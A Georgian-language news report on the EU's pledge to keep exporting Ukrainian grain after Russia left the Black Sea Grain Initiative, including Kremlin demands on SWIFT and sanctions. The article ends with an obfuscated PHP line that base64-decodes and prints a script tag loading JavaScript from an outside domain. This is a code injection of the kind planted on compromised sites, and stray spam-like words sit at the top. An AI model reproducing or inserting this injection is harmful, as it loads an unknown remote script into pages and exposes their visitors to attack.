celsiusi
ავერსი საქკაბელი

ევროკომისიის პრეზიდენტის განცხადებით, ევროკავშირი უკრაინიდან მარცვლეულის ექსპორტს გააგრძელებს. ამის შესახებ ურსულა ფონ დერ ლაიენმა „ტვიტერზე“ დაწერა.

„მკაცრად ვგმობ რუსეთის ცინიკურ ნაბიჯს შავი ზღვის მარცვლეულის ინიციატივის შეწყვეტის შესახებ, მიუხედავად გაერო-სა და თურქეთის ძალისხმევისა. ევროკავშირი მუშაობს მსოფლიოში დაუცველი ადამიანებისთვის სასურსათო უსაფრთხოების უზრუნველსაყოფად. ევროკავშირი გააგრძელებს აგროპროდუქტების გამოტანას უკრაინიდან“, – წერს ურსულა ფონ დერ ლაიენი.

შეგახსენებთ, რუსეთის მთავრობამ უკრაინიდან მარცვლეულის ექსპორტის შეთანხმება შეაჩერა. კრემლის განცხადებით, გაეროს შუამავლობით მიღწეული შეთანხმება იქამდე არ გახანგრძლივდება, სანამ რუსეთის მოთხოვნები არ დაკმაყოფილდება.

კრემლის სპიკერის, დმიტრი პესკოვის განცხადებით, რუსეთი შეთანხმებას მას შემდეგ დაუბრუნდება, როდესაც დასავლეთი მის მოთხოვნებს დააკმაყოფილებს. ამ მოთხოვნებს შორისაა: ზოგიერთი რუსული ბანკის SWIFT-ის სისტემაში დაბრუნება, სანქციების შემსუბუქება და რუსეთზე დაწესებული ეკონომიკური ბლოკადის მოხსნა. 

298
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");